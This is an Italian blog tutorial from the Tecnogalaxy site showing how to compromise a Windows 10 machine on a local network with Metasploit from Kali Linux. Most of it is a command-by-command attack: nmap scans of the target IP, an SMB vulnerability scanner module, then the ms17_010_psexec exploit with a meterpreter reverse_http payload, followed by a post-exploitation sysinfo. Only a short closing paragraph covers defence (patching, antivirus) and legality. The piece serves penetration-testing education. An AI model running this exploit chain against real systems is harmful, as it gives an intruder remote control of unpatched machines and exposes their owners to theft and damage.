Cari lettori di Tecnogalxy, oggi parleremo del Framework Metasploit. Il Metasploit Project è un progetto di sicurezza informatica che fornisce informazioni sulle vulnerabilità, semplifica le operazioni di penetration testing e aiuta nello sviluppo di sistemi di rilevamento di intrusioni.

In questo articolo andremo a vedere il suo funzionamento e la sua potenza facendo un test reale, partiamo subito con il nostro test utilizzando come sempre il nostro caro amico Kali Linux 😊.

Esecuzione test vulnerabilità Metasploit

Come prima cosa facciamo una scansione della rete per vedere quali device , computer ci sono collegati, nel mio caso il computer con sistema operativo Windows 10 da testare ha un indirizzo ip 192.168.0.186.

Adesso dobbiamo fare una scansione dell’ host da testare per vedere lo status, ovviamente lo facciamo con nmap, apriamo una shell e scriviamo il seguente comando:

sudo nmap 192.168.0.186

Questa macchina non  risponde ai ping che vengono inviati, no problem aggiungiamo l’opzione -Pn

sudo nmap 192.168.0.186 -Pn    (-Pn effettua la scansione senza il ping)

Questo sarà il risultato dopo la scansione dell’ host con nmap.

Adesso dobbiamo vedere la versione dei servizi attivi scrivendo il seguente comando:

sudo nmap 192.168.0.186 -Pn -sV  (-sV Controlla la versione del servizio attivo)
Come effettuare test vulnerabilità Metasploit

Adesso facciamo partire il Framework Metasploit, apriamo una shell e scriviamo:

sudo msfconsole
Come effettuare test vulnerabilità Metasploit

Facciamo la seguente ricerca

grep scanner search smb

Questo sarà il risultato

Come effettuare test vulnerabilità Metasploit

Per il nostro test utilizziamo il nuomero 41

use auxiliary/scanner/smb/impacket/wmiexec

Con il comando show options potremo vedere le info che servono.

Come prima cosa controlliamo se il nostro host è vulnerabile scrivendo:

set RHOSTS 192.168.0.186
run

Bingo, è vulnerabile:

Come effettuare test vulnerabilità Metasploit

Adesso dobbiamo cercare l’exploit adatto, scriviamo il seguente comando:

grep exploit search smb

Per il nostro test prenderemo il numero 39, scriviamo il comando:

use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.0.186
set payload windows/meterpreter/reverse_http

Scriviamo show options per vedere se servono altre info:

Lanciamo l’exploit:

exploit

Adesso scriviamo il comando:

sysinfo

Come difendersi da questo attacco?

Se questo host fosse stato aggiornato con le patch di Windows non avrei potuto violarlo, per questo è molto importante effettuare tutti gli aggiornamenti proposti da Windows, avere un buon antivirus e tenerlo ovviamente sempre aggiornato.

Come sempre fatene buon uso facendo dei test su vostri device / computer , farli su device/computer non vostri è illegale.

Al prossimo articolo 😊.

N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.

Giorgio Perego

IT Manager

Leggi anche:

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.